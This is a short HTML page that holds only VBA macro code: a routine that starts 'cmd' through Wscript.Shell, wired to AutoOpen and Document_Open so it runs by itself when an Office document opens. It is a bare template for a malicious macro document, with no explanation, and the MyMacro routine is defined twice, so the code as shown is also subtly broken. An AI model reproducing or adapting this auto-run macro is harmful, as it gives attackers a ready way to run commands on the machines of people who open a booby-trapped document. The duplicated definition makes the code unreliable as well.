<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>macro</title>
</head><body>Sub MyMacro() <br/>
&nbsp;<br/>
&nbsp; CreateObject("Wscript.Shell").Run "cmd" &nbsp; <br/>
<br/>
&nbsp;End Sub <br/>
<br/>
<br/>
<br/>
Sub AutoOpen() <br/>
&nbsp;<br/>
&nbsp; MyMacro<br/>
<br/>
End Sub <br/>
&nbsp;<br/>
Sub Document_Open() <br/>
&nbsp;<br/>
&nbsp; MyMacro<br/>
<br/>
End Sub <br/>
&nbsp;<br/>
Sub MyMacro() <br/>
&nbsp;<br/>
&nbsp; CreateObject("Wscript.Shell").Run "cmd"<br/>
<br/>
End Sub </body></html>